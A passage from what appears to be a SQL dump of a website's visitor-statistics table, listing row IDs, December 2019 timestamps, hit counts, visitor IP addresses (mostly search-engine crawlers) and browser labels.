55.39.64','other'),(468111,1576091196,1,1,0,0,'207.46.13.163','other'),(468112,1576091428,5,5,0,0,'66.249.64.26','chrome'),(468113,1576091595,1,1,0,0,'157.55.39.228','other'),(468114,1576092101,3,3,0,0,'66.249.64.27','chrome'),(468115,1576092137,1,0,1,0,'66.249.70.62',''),(468116,1576092605,1,1,0,0,'207.46.13.126','other'),(468117,1576092608,1,1,0,0,'66.249.70.36','chrome'),(468118,1576092819,48,48,0,0,'45.93.12.12','other'),(468119,1576093014,2,1,1,0,'66.249.64.27',''),(468120,1576093044,1,1,0,0,'66.249.64.26','chrome'),(468121,1576093056,1,1,0,0,'5.45.207.49','other'),(468122,1576093085,1,1,0,0,'141.8.132.19','other'),(468123,1576093113,1,1,0,0,'66.249.64.28','chrome'),(468124,1576093891,1,1,0,0,'66.249.64.27','chrome'),(468125,1576093910,1,1,0,0,'37.9.113.142','other'),(468126,1576094026,2,2,0,0,'66.249.64.26','chrome'),(468127,1576094084,19,19,0,0,'45.93.12.12','other'),(468128,1576094216,4,4,0,0,'66.102.6.43','other'),(468129,1576094217,6,6,0,0,'66.249.83.199','chrome'),(468132,1576094218,2,2,0,0,'66.249.83.199','other'),(468142,1576094219,1,1,0,0,'66.102.8.90','chrome'),(468143,1576094220,2,2,0,0,'66.249.83.201','chrome'),(468152,1576094222,1,1,0,0,'66.102.6.41','chrome'),(468154,1576094221,1,1,0,0,'74.125.209.5','other'),(468163,1576094223,1,1,0,0,'74.125.209.2','other'),(468165,1576094224,1,1,0,0,'66.102.6.45','other'),(468168,1576094230,1,1,0,0,'66.249.83.197','chrome'),(468169,1576094494,1,1,0,0,'66.249.64.28','chrome'),(468170,1576094764,1,1,0,0,'91.196.178.132','firefox'),(468171,1576094932,2,2,0,0,'66.249.64.26','chrome'),(468172,1576095051,17,17,0,0,'45.93.12.12','other'),(468173,1576095426,2,2,0,0,'66.249.70.62','chrome'),(468174,1576095711,1,1,0,0,'66.249.64.27','chrome'),(468175,1576095846,1,1,0,0,'141.8.142.119','other'),(468176,1576095890,1,1,0,0,'141.8.132.28','other'),(468177,1576096311,1,1,0,0,'176.122.114.42','chrome'),(468178,1576097141,1,1,0,0,'66.249.64.27','chrome'),(468179,1576097245,1,1,0,0,'157.55.39.189','other'),(468180,1576097265,1,1,0,0,'66.249.70.36','chrome'),(468181,1576097304,1,1,0,0,'213.180.203.44','other'),(468182,1576097903,1,1,0,0,'185.183.96.122','chrome'),(468183,1576097933,133,133,0,0,'45.93.12.12','other'),(468184,1576098047,4,4,0,0,'66.249.64.26','chrome'),(468185,1576098168,2,2,0,0,'66.249.70.62','chrome'),(468186,1576098305,1,1,0,0,'176.122.114.42','chrome'),(468187,1576098342,1,1,0,0,'213.180.203.44','other'),(468188,1576098882,135,135,0,0,'45.93.12.12','other'),(468189,1576098966,2,2,0,0,'66.249.64.28','chrome'),(468190,1576099737,1,1,0,0,'134.175.183.168','other'),(468191,1576100124,1,1,0,0,'8.29.198.27','other'),(468192,1576100425,1,1,0,0,'66.249.64.27','chrome'),(468193,1576100464,1,1,0,0,'66.249.64.26','chrome'),(468194,1576100495,1,1,0,0,'66.249.70.36','chrome'),(468195,1576100558,1,1,0,0,'82.207.94.57','chrome'),(468196,1576100565,1,1,0,0,'31.41.114.109','chrome'),(468197,1576100605,1,1,0,0,'93.79.6.11','chrome'),(468198,1576100632,1,1,0,0,'137.226.113.21','firefox'),(468199,1576100710,1,1,0,0,'66.249.64.28','chrome'),(468200,1576101152,1,1,0,0,'8.29.198.26','other'),(468201,1576101244,1,1,0,0,'141.8.142.2','other'),(468202,1576101631,2,2,0,0,'66.249.64.27','chrome'),(468203,1576101782,1,1,0,0,'66.249.70.62','chrome'),(468204,1576101872,1,1,0,0,'137.226.113.27','other'),(468205,1576102447,2,2,0,0,'66.249.64.26','chrome'),(468206,1576102984,1,1,0,0,'66.249.64.28','chrome'),(468207,1576103143,1,1,0,0,'66.249.70.36','chrome'),(468208,1576103223,1,1,0,0,'137.226.113.34','firefox'),(468209,1576103234,1,1,0,0,'66.249.70.62','chrome'),(468210,1576103235,1,1,0,0,'207.46.13.126','other'),(468211,1576103422,1,1,0,0,'213.180.203.44','other'),(468212,1576103845,2,2,0,0,'66.249.64.27','chrome'),(468213,1576104017,2,2,0,0,'66.249.64.26','chrome'),(468214,1576104683,2,2,0,0,'66.249.64.28','chrome'),(468215,1576104928,13,13,0,0,'45.93.12.12','other'),(468216,1576104932,3,3,0,0,'66.249.64.26','chrome'),(468217,1576105009,1,1,0,0,'52.162.161.148','other'),(468218,1576105024,3,3,0,0,'66.249.64.27','chrome'),(468219,1576105987,16,16,0,0,'45.93.12.12','other'),(468220,1576106213,2,2,0,0,'66.249.64.26','chrome'),(468221,1576106217,1,1,0,0,'66.249.64.27','chrome'),(468222,1576106336,1,1,0,0,'66.249.64.28','chrome'),(468223,1576107260,2,2,0,0,'66.249.64.28','chrome'),(468224,1576107439,2,2,0,0,'66.249.64.27','chrome'),(468225,1576107531,1,1,0,0,'95.108.213.39','other'),(468226,1576108263,1,1,0,0,'66.249.64.28','chrome'),(468227,1576108380,1,1,0,0,'157.55.39.78','other'),(468228,1576108745,1,1,0,0,'141.8.188.39','other'),(468229,1576109135,1,1,0,0,'46.4.33.48','other'),(468230,1576109250,3,3,0,0,'66.249.64.27','chrome'),(468231,1576109573,1,1,0,0,'68.183.108.166','other'),(468232,1576109703,1,1,0,0,'95.108.213.61','other'),(468233,1576109761,1,1,0,0,'66.249.70.62','chrome'),(468234,1576110100,1,1,0,0,'66.249.64.26','chrome'),(468235,1576110997,1,1,0,0,'207.46.13.30','other'),(468236,1576111025,1,1,0,0,'8.29.198.27','other'),(468237,1576111086,1,1,0,0,'157.55.39.78','other'),(468238,1576111123,1,1,0,0,'66.249.64.28','chrome'),(468239,1576111141,1,1,0,0,'66.249.70.36','chrome'),(468240,1576111247,1,1,0,0,'157.55.39.185','other'),(468241,1576112042,1,1,0,0,'8.29.198.27','other'),(468242,1576112114,1,1,0,0,'62.205.134.182','other'),(468243,1576112514,1,1,0,0,'213.180.203.44','other'),(468244,1576112585,1,1,0,0,'207.46.13.30','other'),(468245,1576112591,1,1,0,0,'207.46.13.54','other'),(468246,1576113032,4,4,0,0,'66.249.64.26','chrome'),(468247,1576113433,1,1,0,0,'66.249.64.28','chrome'),(468248,1576114387,1,1,0,0,'207.46.13.173','other'),(468249,1576114463,1,1,0,0,'66.249.64.26','chrome'),(468250,1576114537,1,1,0,0,'66.249.70.33','chrome'),(468251,1576114875,2,2,0,0,'66.249.64.28','chrome'),(468252,1576115423,1,1,0,0,'207.46.13.30','other'),(468253,1576115453,1,1,0,0,'66.249.70.62','chrome'),(468254,1576115858,1,1,0,0,'87.250.224.104','other'),(468255,1576116501,4,4,0,0,'66.249.64.27','chrome'),(468256,1576116795,1,1,0,0,'66.249.64.26','chrome'),(468257,1576116944,2,2,0,0,'66.249.64.28','chrome'),(468258,1576117378,1,1,0,0,'157.55.39.243','other'),(468259,1576117726,1,1,0,0,'176.110.134.2','chrome'),(468260,1576117827,1,1,0,0,'66.249.70.33','chrome'),(468261,1576117832,1,1,0,0,'2.93.79.184','other'),(468262,1576117928,1,1,0,0,'66.249.64.28','chrome'),(468263,1576117967,2,2,0,0,'66.249.64.26','chrome'),(468264,1576118219,2,2,0,0,'66.249.64.27','chrome'),(468265,1576118580,1,1,0,0,'66.249.70.62','chrome'),(468266,1576119006,1,1,0,0,'188.40.131.176','chrome'),(468267,1576119181,4,4,0,0,'66.249.64.27','chrome'),(468268,1576119214,3,3,0,0,'66.249.64.26','chrome'),(468269,1576120069,1,1,0,0,'66.249.64.28','chrome'),(468270,1576120360,3,3,0,0,'66.249.64.27','chrome'),(468271,1576120481,1,1,0,0,'66.249.64.26','chrome'),(468272,1576120554,1,1,0,0,'213.180.203.37','other'),(468273,1576120964,1,1,0,0,'66.249.70.62','chrome'),(468274,1576121909,1,1,0,0,'8.29.198.27','other'),(468275,1576122905,1,1,0,0,'207.46.13.30','other'),(468276,1576122941,1,1,0,0,'8.29.198.25','other'),(468277,1576122977,1,1,0,0,'66.249.64.27','chrome'),(468278,1576123368,1,1,0,0,'91.196.178.79','chrome'),(468279,1576124542,1,1,0,0,'128.124.23.124','chrome'),(468280,1576124994,1,1,0,0,'66.249.64.26','chrome'),(468281,1576125897,1,1,0,0,'91.196.178.79','chrome'),(468282,1576126351,1,1,0,0,'66.249.64.26','chrome'),(468283,1576126506,1,1,0,0,'66.249.64.28','chrome'),(468284,1576126755,1,1,0,0,'66.249.70.62','chrome'),(468285,1576127233,1,1,0,0,'66.249.70.36','chrome'),(468286,1576127930,1,1,0,0,'66.249.70.33','chrome'),(468287,1576127982,1,1,0,0,'66.249.64.28','chrome'),(468288,1576128343,1,1,0,0,'66.249.70.36','chrome'),(468289,1576128394,1,1,0,0,'213.180.203.44','other'),(468290,1576128608,1,1,0,0,'207.46.13.30','other'),(468291,1576128884,1,1,0,0,'66.249.64.28','chrome'),(468292,1576129283,1,1,0,0,'66.249.70.33','chrome'),(468293,1576129398,1,1,0,0,'62.205.134.182','other'),(468294,1576130356,1,1,0,0,'66.249.70.33','chrome'),(468295,1576130916,5,5,0,0,'104.248.129.120','other'),(468296,1576132021,1,1,0,0,'66.249.64.26','chrome'),(468297,1576132049,1,1,0,0,'66.249.64.27','chrome'),(468298,1576132192,1,1,0,0,'66.249.64.28','chrome'),(468299,1576132794,1,1,0,0,'8.29.198.27','other'),(468300,1576133397,1,1,0,0,'178.93.12.152','chrome'),(468301,1576133847,1,1,0,0,'91.196.178.175','chrome'),(468302,1576133871,1,1,0,0,'8.29.198.25','other'),(468303,1576134142,1,1,0,0,'66.249.64.27','chrome'),(468304,1576134702,1,1,0,0,'128.124.219.176','chrome'),(468305,1576135110,1,1,0,0,'91.196.177.46','chrome'),(468306,1576135133,1,1,0,0,'31.13.127.11','other'),(468307,1576135134,1,1,0,0,'31.13.127.13','other'),(468309,1576135135,1,1,0,0,'31.13.127.17','other'),(468310,1576135162,3,3,0,0,'66.249.64.28','chrome'),(468311,1576135346,1,1,0,0,'66.249.70.33','chrome'),(468312,1576135368,1,1,0,0,'91.196.178.79','chrome'),(468313,1576135833,1,1,0,0,'66.249.64.27','chrome'),(468314,1576136560,1,1,0,0,'91.196.178.169','chrome'),(468315,1576136575,1,0,1,0,'66.249.70.33',''),(468316,1576136906,1,1,0,0,'66.249.64.26','chrome'),(468317,1576137003,2,2,0,0,'141.8.188.39','other'),(468318,1576137077,1,1,0,0,'207.46.13.30','other'),(468319,1576137083,2,2,0,0,'207.46.13.15','other'),(468320,1576137432,2,2,0,0,'66.249.70.62','chrome'),(468321,1576137578,1,1,0,0,'66.249.64.28','chrome'),(468322,1576138727,1,1,0,0,'66.249.64.27','chrome'),(468323,1576138907,1,1,0,0,'91.196.178.188','chrome'),(468324,1576139036,1,1,0,0,'46.211.134.231','chrome'),(468325,1576139271,1,1,0,0,'207.46.13.15','other'),(468326,1576139379,2,2,0,0,'78.111.187.234','chrome'),(468327,1576139452,1,1,0,0,'66.249.64.26','chrome'),(468328,1576139748,1,1,0,0,'91.196.178.92','chrome'),(468329,1576139965,1,1,0,0,'91.196.178.169','chrome'),(468330,1576140169,1,1,0,0,'91.196.178.166','chrome'),(468331,1576140485,1,1,0,0,'5.45.207.49','other'),(468332,1576141206,1,1,0,0,'213.108.45.138','chrome'),(468333,1576141266,1,1,0,0,'77.111.244.205','chrome'),(468334,1576141504,1,1,0,0,'46.211.133.141','other'),(468335,1576141530,1,1,0,0,'178.154.171.66','other'),(468336,1576141556,2,2,0,0,'91.196.178.166','chrome'),(468337,1576141737,1,1,0,0,'141.8.142.115','other'),(468338,1576141786,2,2,0,0,'91.226.212.32','firefox'),(468339,1576141788,1,1,0,0,'91.226.212.32','chrome'),(468340,1576142214,1,1,0,0,'31.13.127.9','other'),(468341,1576142215,1,1,0,0,'31.13.127.3','other'),(468342,1576142217,1,1,0,0,'31.13.127.8','other'),(468343,1576143217,1,1,0,0,'91.196.178.104','other'),(468344,1576143243,1,1,0,0,'66.249.64.27','chrome'),(468345,1576143665,1,1,0,0,'8.29.198.26','other'),(468346,1576144032,1,1,0,0,'141.8.142.115','other'),(468347,1576144423,1,1,0,0,'66.249.64.28','chrome'),(468348,1576144453,1,1,0,0,'91.196.178.169','chrome'),(468349,1576144612,1,1,0,0,'66.249.70.62','chrome'),(468350,1576144776,1,1,0,0,'8.29.198.27','other'),(468351,1576144783,1,1,0,0,'91.196.178.179','chrome'),(468352,1576144881,1,1,0,0,'91.196.178.104','chrome'),(468353,1576144906,1,1,0,0,'46.182.81.102','chrome'),(468354,1576144922,1,1,0,0,'78.111.187.108','chrome'),(468355,1576145324,1,1,0,0,'91.196.178.129','chrome'),(468356,1576145694,1,1,0,0,'37.53.231.239','chrome'),(468357,1576145908,1,1,0,0,'3.19.239.147','chrome'),(468358,1576145957,1,1,0,0,'66.249.64.27','chrome'),(468359,1576147470,1,1,0,0,'91.196.178.187','chrome'),(468360,1576147533,1,1,0,0,'207.46.13.62','other'),(468361,1576147927,1,1,0,0,'66.249.64.26','chrome'),(468362,1576148531,1,1,0,0,'66.249.64.27','chrome'),(468363,1576149158,1,1,0,0,'91.196.178.92','firefox'),(468364,1576149239,1,1,0,0,'207.46.13.62','other'),(468365,1576149809,1,1,0,0,'109.74.154.72','chrome'),(468366,1576150290,1,1,0,0,'37.53.231.239','chrome'),(468367,1576150484,2,2,0,0,'66.249.64.26','chrome'),(468368,1576151194,1,1,0,0,'66.249.64.27','chrome'),(468369,1576151442,1,1,0,0,'92.112.225.115','chrome'),(468370,1576151597,1,1,0,0,'66.249.64.26','chrome'),(468371,1576151710,1,1,0,0,'37.9.113.202','other'),(468372,1576151756,1,1,0,0,'66.249.64.28','chrome'),(468373,1576151898,1,1,0,0,'91.196.178.79','chrome'),(468374,1576151989,1,1,0,0,'95.132.14.218','chrome'),(468375,1576152721,1,1,0,0,'31.13.127.1','other'),(468376,1576152723,1,1,0,0,'31.13.127.5','other'),(468377,1576153456,1,1,0,0,'66.249.64.28','chrome'),(468378,1576153702,1,1,0,0,'91.196.178.162','chrome'),(468379,1576153818,1,1,0,0,'37.53.224.183','chrome'),(468380,1576153828,3,3,0,0,'66.249.64.27','chrome'),(468381,1576153830,1,1,0,0,'91.196.178.169','chrome'),(468382,1576154018,1,1,0,0,'66.249.64.26','chrome'),(468383,1576154116,1,1,0,0,'66.249.70.62','chrome'),(468384,1576154313,1,1,0,0,'207.46.13.62','other'),(468385,1576154566,1,1,0,0,'8.29.198.27','other'),(468386,1576154670,1,1,0,0,'78.111.187.32','chrome'),(468387,1576154695,1,1,0,0,'91.196.178.162','chrome'),(468388,1576154932,2,2,0,0,'66.249.70.33','chrome'),(468389,1576155482,2,2,0,0,'66.249.64.26','chrome'),(468390,1576155694,1,1,0,0,'8.29.198.26','other'),(468391,1576155757,1,1,0,0,'66.249.64.27','chrome'),(468392,1576155839,1,1,0,0,'178.212.111.229','firefox'),(468393,1576156199,1,1,0,0,'141.8.142.119','other'),(468394,1576156291,1,1,0,0,'91.196.178.79','chrome'),(468395,1576156700,1,1,0,0,'130.180.219.101','chrome'),(468396,1576156755,1,1,0,0,'82.207.49.98','chrome'),(468397,1576156825,1,1,0,0,'91.124.182.170','chrome'),(468398,1576157479,2,2,0,0,'66.249.64.27','chrome'),(468399,1576157483,1,1,0,0,'66.249.64.26','chrome'),(468400,1576157627,1,1,0,0,'66.249.70.36','chrome'),(468401,1576158277,1,1,0,0,'91.196.177.241','chrome'),(468402,1576158359,1,1,0,0,'157.55.39.94','other'),(468403,1576159329,1,1,0,0,'207.46.13.62','other'),(468404,1576159849,1,1,0,0,'37.9.113.142','other'),(468405,1576159967,1,1,0,0,'178.175.133.102','msie'),(468406,1576160679,2,2,0,0,'66.249.64.28','chrome'),(468407,1576160833,1,1,0,0,'195.10.210.70','chrome'),(468408,1576161644,1,1,0,0,'91.196.178.79','chrome'),(468409,1576161755,1,1,0,0,'66.249.64.27','chrome'),(468410,1576161944,1,1,0,0,'195.10.210.70','chrome'),(468411,1576163144,1,1,0,0,'77.111.247.53','chrome'),(468412,1576163193,1,1,0,0,'77.111.244.81','chrome'),(468413,1576163652,2,2,0,0,'66.249.70.62','chrome'),(468414,1576163702,1,1,0,0,'5.9.98.178','other'),(468415,1576163859,4,4,0,0,'66.249.64.28','chrome'),(468416,1576163919,2,2,0,0,'66.249.64.26','chrome'),(468417,1576164396,1,1,0,0,'91.196.179.138','chrome'),(468418,1576164581,1,1,0,0,'95.108.213.39','other'),(468419,1576164608,1,1,0,0,'5.9.98.178','other'),(468420,1576164689,1,1,0,0,'66.249.70.33','chrome'),(468421,1576164817,3,3,0,0,'66.249.64.28','chrome'),(468422,1576165038,2,2,0,0,'178.212.111.229','firefox'),(468423,1576165472,1,1,0,0,'8.29.198.27','other'),(468424,1576165532,1,1,0,0,'5.9.98.178','other'),(468425,1576166275,2,2,0,0,'66.249.64.26','chrome'),(468426,1576166293,1,1,0,0,'178.212.111.229','firefox'),(468427,1576166444,1,1,0,0,'5.9.98.178','other'),(468428,1576166540,1,1,0,0,'207.46.13.62','other'),(468429,1576166639,1,1,0,0,'8.29.198.25','other'),(468430,1576166765,1,1,0,0,'66.249.70.33','chrome'),(468431,1576166937,1,1,0,0,'144.202.60.15','chrome'),(468432,1576166992,1,1,0,0,'195.10.210.70','chrome'),(468433,1576167116,1,1,0,0,'134.249.98.209','other'),(468434,1576167345,1,1,0,0,'5.9.98.178','other'),(468435,1576167851,1,1,0,0,'66.249.70.62','chrome'),(468436,1576168251,1,1,0,0,'5.9.98.178','other'),(468437,1576168643,1,1,0,0,'91.196.178.180','chrome'),(468438,1576168797,1,1,0,0,'66.249.70.36','chrome'),(468439,1576169244,1,1,0,0,'5.9.98.178','other'),(468440,1576169411,1,1,0,0,'91.196.178.103','other'),(468441,1576169768,1,1,0,0,'157.55.39.94','other'),(468442,1576170146,1,1,0,0,'5.9.98.178','other'),(468443,1576171048,1,1,0,0,'5.9.98.178','other'),(468444,1576171654,1,1,0,0,'207.46.13.62','other'),(468445,1576171949,1,1,0,0,'5.9.98.178','other'),(468446,1576172242,1,1,0,0,'128.124.219.176','chrome'),(468447,1576172499,1,1,0,0,'141.8.132.2','other'),(468448,1576172723,3,3,0,0,'195.88.242.221','firefox'),(468449,1576172726,1,1,0,0,'195.88.242.221','chrome'),(468450,1576173261,1,1,0,0,'207.46.13.62','other'),(468451,1576173436,1,1,0,0,'157.55.39.94','other'),(468452,1576173618,1,1,0,0,'66.249.70.36','chrome'),(468453,1576173696,1,1,0,0,'5.45.207.49','other'),(468454,1576173926,3,3,0,0,'66.249.64.26','chrome'),(468455,1576174049,1,1,0,0,'13.66.139.0','other'),(468456,1576174094,4,4,0,0,'66.249.64.27','chrome'),(468457,1576174209,4,4,0,0,'66.249.64.28','chrome'),(468458,1576174311,2,2,0,0,'207.46.13.62','other'),(468459,1576174867,2,2,0,0,'66.249.64.26','chrome'),(468460,1576174922,1,1,0,0,'66.249.70.33','chrome'),(468461,1576175261,1,1,0,0,'157.55.39.94','other'),(468462,1576176086,4,4,0,0,'66.249.64.27','chrome'),(468463,1576176263,1,1,0,0,'66.249.70.36','chrome'),(468464,1576176358,2,2,0,0,'66.249.64.26','chrome'),(468465,1576176389,1,1,0,0,'8.29.198.26','other'),(468466,1576176487,1,1,0,0,'207.46.13.62','other'),(468467,1576176948,1,1,0,0,'157.55.39.197','other'),(468468,1576177533,1,1,0,0,'8.29.198.26','other'),(468469,1576177713,1,1,0,0,'91.196.178.79','chrome'),(468470,1576177715,3,3,0,0,'66.249.88.149','chrome'),(468471,1576177723,4,4,0,0,'66.249.88.143','chrome'),(468472,1576177725,4,4,0,0,'66.249.83.201','chrome'),(468473,1576177732,3,3,0,0,'66.249.83.197','chrome'),(468474,1576177733,7,7,0,0,'66.249.88.146','chrome'),(468475,1576177740,1,1,0,0,'66.102.9.164','chrome'),(468476,1576177741,4,4,0,0,'66.102.9.161','chrome'),(468478,1576177782,1,1,0,0,'66.249.83.199','chrome'),(468479,1576178487,3,3,0,0,'66.249.64.26','chrome'),(468480,1576178683,2,2,0,0,'66.249.64.28','chrome'),(468481,1576178942,1,1,0,0,'66.249.64.27','chrome'),(468482,1576179292,1,1,0,0,'157.55.39.197','other'),(468483,1576180102,1,1,0,0,'213.180.203.44','other'),(468484,1576180129,4,4,0,0,'66.249.64.26','chrome'),(468485,1576180233,1,1,0,0,'66.249.70.33','chrome'),(468486,1576180318,1,1,0,0,'66.249.64.27','chrome'),(468487,1576180399,1,1,0,0,'37.53.224.183','chrome'),(468488,1576181126,1,1,0,0,'66.249.64.26','chrome'),(468489,1576181554,1,1,0,0,'52.162.161.148','other'),(468490,1576182924,2,2,0,0,'66.249.64.28','chrome'),(468491,1576183368,1,1,0,0,'66.249.70.36','chrome'),(468492,1576183379,1,1,0,0,'66.249.64.27','chrome'),(468493,1576184558,1,1,0,0,'66.249.64.26','chrome'),(468494,1576185533,1,1,0,0,'66.249.64.26','chrome'),(468495,1576185619,1,1,0,0,'66.249.70.36','chrome'),(468496,1576185839,2,2,0,0,'66.249.64.27','chrome'),(468497,1576186957,2,2,0,0,'188.166.116.151','chrome'),(468498,1576187268,1,1,0,0,'8.29.198.27','other'),(468499,1576187674,1,1,0,0,'46.211.135.151','other'),(468500,1576187700,1,1,0,0,'207.46.13.62','other'),(468501,1576188413,1,1,0,0,'178.133.113.58','chrome'),(468502,1576188446,1,1,0,0,'8.29.198.26','other'),(468503,1576188448,1,1,0,0,'88.154.147.210','other'),(468504,1576188620,1,1,0,0,'66.249.64.28','chrome'),(468505,1576188760,1,1,0,0,'207.46.13.219','other'),(468506,1576189211,1,1,0,0,'207.46.13.232','other'),(468507,1576189466,1,1,0,0,'66.249.64.26','chrome'),(468508,1576189587,1,1,0,0,'66.249.64.28','chrome'),(468509,1576189843,2,2,0,0,'66.249.70.33','chrome'),(468510,1576191045,1,1,0,0,'66.249.70.62','chrome'),(468511,1576191077,1,1,0,0,'66.249.64.27','chrome'),(468512,1576191496,1,1,0,0,'66.249.64.28','chrome'),(468513,1576191755,1,1,0,0,'66.249.64.26','chrome'),(468514,1576192891,1,1,0,0,'31.13.103.22','other'),(468515,1576192892,1,1,0,0,'31.13.103.12','other'),(468516,1576195009,1,1,0,0,'213.180.203.44','other'),(468517,1576196057,1,1,0,0,'66.249.64.26','chrome'),(468518,1576197065,1,1,0,0,'66.249.64.26','chrome'),(468519,1576198179,1,1,0,0,'8.29.198.26','other'),(468520,1576198515,1,1,0,0,'62.205.134.182','other'),(468521,1576199323,1,1,0,0,'8.29.198.26','other'),(468522,1576199639,2,2,0,0,'207.46.13.232','other'),(468523,1576200979,1,1,0,0,'207.46.13.57','other'),(468524,1576201255,1,1,0,0,'207.46.13.219','other'),(468525,1576201936,2,2,0,0,'157.55.39.94','other'),(468526,1576202909,1,1,0,0,'207.46.13.32','other'),(468527,1576204971,1,1,0,0,'207.46.13.76','other'),(468528,1576206508,1,1,0,0,'213.180.203.44','other'),(468529,1576206748,1,1,0,0,'207.46.13.32','other'),(468530,1576209127,1,1,0,0,'8.29.198.25','other'),(468531,1576210202,1,1,0,0,'8.29.198.27','other'),(468532,1576211244,1,1,0,0,'207.46.13.76','other'),(468533,1576212704,1,1,0,0,'207.46.13.32','other'),(468534,1576215886,1,1,0,0,'62.205.134.182','other'),(468535,1576217558,1,1,0,0,'66.249.70.36','chrome'),(468536,1576219872,2,2,0,0,'93.94.66.0','chrome'),(468537,1576220016,1,1,0,0,'8.29.198.25','other'),(468538,1576220181,1,1,0,0,'207.46.13.118','other'),(468539,1576220210,1,1,0,0,'178.133.13.48','chrome'),(468540,1576220230,1,1,0,0,'141.8.142.2','other'),(468541,1576221068,1,1,0,0,'8.29.198.26','other'),(468542,1576221931,1,1,0,0,'207.46.13.135','other'),(468543,1576222837,1,1,0,0,'207.46.13.135','other'),(468544,1576223280,1,1,0,0,'94.178.148.230','chrome'),(468545,1576223342,1,1,0,0,'213.180.203.44','other'),(468546,1576223788,1,1,0,0,'66.249.70.33','chrome'),(468547,1576223917,2,2,0,0,'91.196.178.65','chrome'),(468548,1576224057,3,3,0,0,'157.55.39.192','other'),(468549,1576224305,1,1,0,0,'66.249.64.28','chrome'),(468550,1576224652,1,1,0,0,'66.249.64.27','chrome'),(468551,1576224933,5,5,0,0,'207.46.13.135','other'),(468552,1576225182,1,1,0,0,'213.180.203.37','other'),(468553,1576225615,1,1,0,0,'207.46.13.118','other'),(468554,1576225897,1,1,0,0,'213.180.203.44','other'),(468555,1576226393,2,2,0,0,'207.46.13.135','other'),(468556,1576226435,1,1,0,0,'209.17.96.58','other'),(468557,1576226672,2,2,0,0,'207.46.13.118','other'),(468558,1576227416,1,1,0,0,'213.180.203.37','other'),(468559,1576227730,1,1,0,0,'37.53.132.18','firefox'),(468560,1576228199,1,1,0,0,'91.196.122.6','other'),(468561,1576228434,1,1,0,0,'213.180.203.44','other'),(468562,1576228650,1,1,0,0,'213.180.203.37','other'),(468563,1576229136,1,1,0,0,'46.162.1.253','chrome'),(468564,1576229324,1,1,0,0,'178.133.13.48','chrome'),(468565,1576229631,1,1,0,0,'66.249.64.28','chrome'),(468566,1576229778,1,1,0,0,'213.180.203.44','other'),(468567,1576229779,1,1,0,0,'213.180.203.37','other'),(468568,1576230095,2,2,0,0,'157.55.39.192','other'),(468569,1576230210,1,1,0,0,'3.15.166.129','chrome'),(468570,1576230317,1,1,0,0,'91.196.178.169','chrome'),(468571,1576230857,1,1,0,0,'91.196.178.93','firefox'),(468572,1576230887,1,1,0,0,'8.29.198.26','other'),(468573,1576230921,1,1,0,0,'77.93.63.254','chrome'),(468574,1576231078,1,1,0,0,'91.196.178.179','chrome'),(468575,1576231088,1,1,0,0,'91.196.178.79','firefox'),(468576,1576231756,1,1,0,0,'207.46.13.118','other'),(468577,1576231921,1,1,0,0,'8.29.198.26','other'),(468578,1576232256,1,1,0,0,'66.249.64.27','chrome'),(468579,1576232576,1,1,0,0,'213.180.203.44','other'),(468580,1576233467,1,1,0,0,'66.249.64.28','chrome'),(468581,1576234100,1,1,0,0,'157.55.39.192','other'),(468582,1576234278,1,1,0,0,'91.196.178.178','chrome'),(468583,1576234408,1,1,0,0,'195.10.210.70','chrome'),(468584,1576234936,1,1,0,0,'91.196.178.179','chrome'),(468585,1576235449,1,1,0,0,'109.74.154.72','chrome'),(468586,1576235477,1,1,0,0,'66.249.64.27','chrome'),(468587,1576235918,2,2,0,0,'91.196.178.179','chrome'),(468588,1576236425,1,1,0,0,'157.55.39.192','other'),(468589,1576236743,1,1,0,0,'31.13.127.22','other'),(468590,1576236744,1,1,0,0,'31.13.127.12','other'),(468591,1576237013,1,1,0,0,'91.196.178.179','chrome'),(468592,1576238028,1,1,0,0,'91.196.178.179','chrome'),(468593,1576240781,1,1,0,0,'213.180.203.44','other'),(468594,1576241670,1,1,0,0,'91.196.178.10','chrome'),(468595,1576241794,1,1,0,0,'8.29.198.25','other'),(468596,1576241973,2,2,0,0,'207.46.13.135','other'),(468597,1576242400,1,1,0,0,'157.55.39.192','other'),(468598,1576242802,1,1,0,0,'8.29.198.25','other'),(468599,1576243187,1,1,0,0,'207.46.13.135','other'),(468600,1576243219,1,1,0,0,'5.196.92.91','firefox'),(468601,1576244277,1,1,0,0,'46.211.155.222','chrome'),(468602,1576244420,49,49,0,0,'192.99.36.166','other'),(468603,1576245574,1,1,0,0,'94.180.236.145','msie'),(468604,1576246834,1,1,0,0,'91.196.178.163','chrome'),(468605,1576249555,1,1,0,0,'91.124.83.180','chrome'),(468606,1576249785,1,1,0,0,'157.55.39.192','other'),(468607,1576250144,1,1,0,0,'91.196.179.61','firefox'),(468608,1576250263,1,1,0,0,'31.13.127.24','other'),(468609,1576250264,1,1,0,0,'31.13.127.5','other'),(468610,1576251647,1,1,0,0,'213.180.203.44','other'),(468611,1576252023,1,1,0,0,'207.46.13.135','other'),(468612,1576252098,1,1,0,0,'104.223.28.164','chrome'),(468613,1576252702,1,1,0,0,'8.29.198.27','other'),(468614,1576253630,2,2,0,0,'207.46.13.135','other'),(468615,1576253686,1,1,0,0,'8.29.198.27','other'),(468616,1576255610,1,1,0,0,'157.55.39.192','other'),(468617,1576256546,1,1,0,0,'157.55.39.185','other'),(468618,1576257823,2,2,0,0,'185.11.29.187','chrome'),(468619,1576258464,1,1,0,0,'66.249.64.26','chrome'),(468620,1576258932,1,1,0,0,'66.249.64.27','chrome'),(468621,1576259351,1,1,0,0,'46.211.158.174','chrome'),(468622,1576259900,1,0,1,0,'66.249.64.27',''),(468623,1576259966,1,1,0,0,'213.180.203.44','other'),(468624,1576260416,1,1,0,0,'207.46.13.135','other'),(468625,1576261609,1,1,0,0,'66.249.70.62','chrome'),(468626,1576263588,1,1,0,0,'8.29.198.27','other'),(468627,1576264013,1,1,0,0,'66.249.64.27','chrome'),(468628,1576264035,1,1,0,0,'157.245.4.67','other'),(468629,1576264037,1,1,0,0,'66.249.70.62','chrome'),(468630,1576264036,1,1,0,0,'157.245.4.67','chrome'),(468631,1576264166,1,1,0,0,'46.201.135.157','chrome'),(468632,1576264574,1,1,0,0,'8.29.198.26','other'),(468633,1576265230,1,1,0,0,'66.249.70.33','chrome'),(468634,1576265350,1,1,0,0,'37.73.18.167','other'),(468635,1576266528,2,2,0,0,'207.46.13.135','other'),(468636,1576266919,1,1,0,0,'157.55.39.185','other'),(468637,1576267453,1,0,1,0,'66.249.70.33',''),(468638,1576267879,2,2,0,0,'207.46.13.135','other'),(468639,1576269286,1,1,0,0,'213.180.203.44','other'),(468640,1576270042,1,1,0,0,'5.189.159.208','other'),(468641,1576270053,1,1,0,